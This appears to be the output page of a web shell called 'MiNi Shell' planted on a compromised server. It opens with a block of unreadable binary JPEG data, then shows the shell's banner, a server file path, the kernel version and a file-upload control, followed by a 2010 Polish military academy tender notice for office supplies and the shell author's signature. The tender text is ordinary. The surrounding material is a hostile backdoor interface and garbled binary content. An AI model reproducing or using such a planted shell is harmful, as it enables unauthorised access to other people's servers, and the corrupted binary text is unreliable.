JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/147424-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa papieru i tektury, wyrobów z papieru i tektury, wyrobów piśmiennych oraz sprzętu i artykułów biurowych</b><br>
<b>Numer ogłoszenia: 147424 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Obrony Narodowej , al. Gen. A. Chruściela 103, 00-910 Warszawa, woj. mazowieckie, tel. 022 6813780, faks 022 6813175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aon.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa papieru i tektury, wyrobów z papieru i tektury, wyrobów piśmiennych oraz sprzętu i artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa papieru i tektury, wyrobów z papieru i tektury, różnych produktów z tworzyw sztucznych, wyrobów piśmiennych oraz sprzętu i artykułów biurowych na potrzeby Akademii Obrony Narodowej:
Papier rolka do kasy fiskalnej 57x30 termoczułe	szt	550
Papier do telefaxu 210x30x12	rolka	200
Skoroszyt papierowy	szt	500
Skoroszyty plastikowy A-4 wpinany (czerwony, zielony, niebieski, żółty - po 100 szt każdego koloru)	szt	400
Skorowidz A4, 1/2 A4 i A5 - twarda lakierowana okładka	szt	10
Skorowidz 1/2 A4 - twarda lakierowana okładka	szt	10
Skorowidz 1/2 A5 - twarda lakierowana okładka	szt	10
Notes (karteczki) samoprzyl.75x75 mm - bl. 100	szt	500
Notatnik akademicki A 4 szyty - twarda lakierowana okładka	szt	150
Brulion B5 160k- twarda lakierowana okładka	szt	60
Brulion A5-96k kratka - twarda lakierowana okładka	szt	100
Zeszyt 60k kratka	szt	100
Zeszyt 32k kratka	szt	100
Klej biurowy w sztyfcie 40g	szt	300
Tusz do stempli czerwony, fiolet	szt	40
Nożyczki do papieru dł 25 cm	szt	40
Poduszka do stempli z tuszem czerwony, fiolet	szt	30
Zwilżaczka z gliceryną	szt	20
Papier do drukarki/xero A-4 80g	ryza	5000
Papier kolorowy A-4 (czerwony, zielony , błękitny - po 20 ryz każdego koloru)	ryza	60
Papier kancelaryjny w kratkę A 3 60g	szt	5000
Papier pakowy do żywności	kg	250
Blok do tablicy Flipchart gładki - 40 arkuszy w bloku	szt	20
Teczka wiązana tekturowa biała A4 	szt	1500
Teczka z gumką A4 kolorowa, lakierowana	szt	100
Segregatory A4 50mmm z automatem cienki kartonowo-  polipropylenowy	szt	200
Segregatory A4 75 mm z automatem gruby kartonowo-  polipropylenowy	szt	300
Koperty C6 	szt	3000
Koperty C5 	szt	3500
Koperty C4 	szt	1500
Koperty DL	szt	1000
Zakładka indeksująca	szt	50
Spód do opraw grzbietowych skóropodobny	szt	400
Spinacz do papieru	op100	250
Klipsy do papieru 25 mm	szt	240
Długopis z wkładem zenith - korpus z tworzywa sztucznego z metalowymi elementami niklowanymi	szt	500
Wkład do ołówka 0,5 mm 2B	szt	240
Ołówek biurowy z gumką	szt	144
Ołówek automatyczny 0,5 - przezroczysta obudowa, gumowy uchwyt, metalowy klips	szt	120
Temperówka z pojemnikiem	szt	20
Zakreślacz fluorescencyjny do wszystkich rodzajów papieru, ścięta końcówka, grubość linii 1-5 mm (żółty, pomarańczowy, różowy - po 60 szt każdego koloru)	szt	180
Cienkopis kulkowy, uchwyt w kolorze atramentu. Obudowa z okienkiem pozwalającym na kontrolę zużycia atramentu, skuwka z metalowym klipsem. Grubość linii 0,3 mm dł linii pisania ok. 2500 m( czarny, czerwony niebieski - po 40 szt każdego koloru)	szt	120
Foliopis niezmywalny do klisz, rzutników, folii, płyt CD i DVD w obudowie czarnej szerokość linii S- 0,4 mm (czarny, czerwony, niebieski -po 100 szt każdego koloru)	szt	300
Atrament - naboje - Parker, 	szt	90
Atrament - naboje - Waterman	szt	40
Pióro kulkowe z gumowym uchwytem, metalowymi elementami niklowanymi (czarny i niebieski- po 80 szt każdego koloru)	szt	160
Pisaki do tablic suchościeralnych z gąbką kpl - 4 szt	kpl	80
Zszywki do zszywaczy	op/1000	200
Wkład do pióra kulkowego z pozycji  24	szt	200
Pinezka tablicowa	op 50	80
Pinezki 	op50	300
Marker permanentny z okrągłą końcówką, wodoodporny, nie zawiera xylenu i toluenu, pisze na folii, papierze, szkle, plastiku. Grubość linii pisania ok. 0,9 mm (czarny i niebieski po 60 szt, czerwony - 40 szt)	szt	160
Pisak z fibrową końcówką, grubość linii pisania ok. 0,4 mm wodoodporny pisze na folii, papierze, szkle, plastiku. Nie zawiera xylenu i toluenu ( czarny, czerwony, niebieski - po 40 szt każdego koloru)	szt	120
Okładka do ofert - przednia okładka przezroczysta, druga okładka kolorowa (niebieska, zielona, czerwona_ po 40 szt z każdego koloru)	szt	120
Gumka do ołówka - usuwa grafit wszystkich twardości, oraz kredek ołówkowych Długość Gumni min. 40 mm.	szt	72
Datownik - stempel samotuszujący	szt	10
Korektor w długopisie z metalowa końcówką zaworową, płaski. 	szt	120
Spirale do bindownicy (6 mm - kolor czarny)	op100	5
Spirale do bindownicy (8 mm - kolor czarny)	op100	5
Dziurkacz - nowoczesny wygląd ekonomiczny kształt, dziurkuje do 20 kartek, dopasowany do kształtu ręki, metalowy z pojemnikiem.	szt	60
Zszywacz - metalowy ergonomiczny, uchwyt z tworzywem zapobiegającym zsuwanie się dłoni. Zszywa do 20 kartek zszywkami 246	szt	40
Rozszywacz	szt	20
Tablica korkowa 200x100 w ramie aluminiowej	szt	10
Tablica informacyjna 250x40 w ramie aluminiowej w kolorze granatowym	szt	5
Tablica wolnostojąca 200x100 biała	szt	8
Wata bawełniana wiskozowa opakowanie 200g	kg	15
Linijka biurowa 50 cm	szt	30
Linijka biurowa 30 cm	szt	30
Sznurek pakowy nylonowy (motek 25 dkg)	kg	15
Gąbki wiskozowe	szt	50
Folia do opraw - okładka	szt	500
Folia do laminowania  A-4 100 ?m	ark	1500
Folia do laminowania A-3 100 ?m	ark	800
Koszulki na dokumenty A4 przezroczysta	szt	15000
Pudełko papierowe archiwistyczne A 4150	szt	200
Pudełko papierowe archiwistyczne A 4100	szt	200
Karton okł.1-stronnie powlekany B1-240g z białym spodem	kg	600
Karton okł.1-stronnie powlekany A1-240g z białym spodem	kg	100
Papier offsetowy B1 80g kl III	kg	6000
Papier kreda 2-str powlek B1-150g	kg	500
Papier czerpany A3 na dyplomy	ark	200
Papier Chamois (krem) A4 160g	ryza	20
Papier Chamois (krem) wizytówkowy B1 240g	ark	100
Papier Chamois (krem) tłoczony  A80g	ark	100
Papier marmurek (krem) B1 200g	ark	300
Papier marmurek (jasny szary) B1 200g	ark	300
Papier marmurek (jasno zielony) B1 200g	ark	300
Papier pakowy szary B1	kg	100
Karton broszurowy B1 240g  2 stronnie biały	kg	500
Papier foto A6- hp błyszczący 240g	szt	500
Papier foto A4- hp błyszczący 240g	szt	100
Papier foto A3- hp błyszczący 240g	szt	50
Karton tłoczony A1-200g Elfeinbein	ark	800
Karton ozdobny  tłoczony B1-200g 	ark	1100.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.00-2, 24.91.00.00-6, 22.85.00.00-3, 19.52.00.00-7, 30.90.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kkażda oferta musi być zabezpieczona wadium  w wysokości 1800,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https//aukcje.uzp.gov.pl.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku ustawowej zmiany stawek podatkowych stawek podatku od towarów i usług (VAT) w okresie obowiązywania umowy, Zamawiający dopuści możliwość zmiany wartości umowy (brutto) odpowiednio do zmienionych stawek.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aon.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres jak na wstępie, budynek nr 4 pokój 128. Koszt SIWZ - 6,40 PLN. + koszty wysyłki. SIWZ pobrana ze strony internetowej Zamawiającego jest bezpłatna....</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2010 godzina 10:30, miejsce: Oferty należy składać w siedzibie Zamawiającego, adres jak na wstępie w Kancelarii Jawnej AON - budynek nr 4 - pokój nr 115 (I piętro) do dnia 11-06-2010 r. do godziny 10:30...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Aukcja elektroniczna zostanie unieważniona, a najkorzystniejsza oferta zostanie wybrana spośród ofert pisemnych tylko gdy zaistnieje jedna z n/w okoliczności: a) w postępowaniu wpłynęły mniej niż 3 prawidłowe oferty; b) zaistniały problemy techniczne lub nieprawidłowości w toku aukcji, wynikające z okoliczności niezależnych od zamawiającego. Maksymalny czas trwania aukcji - 60 minut. Aukcja zostanie zamknięta po 20 minutach bezczynności..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com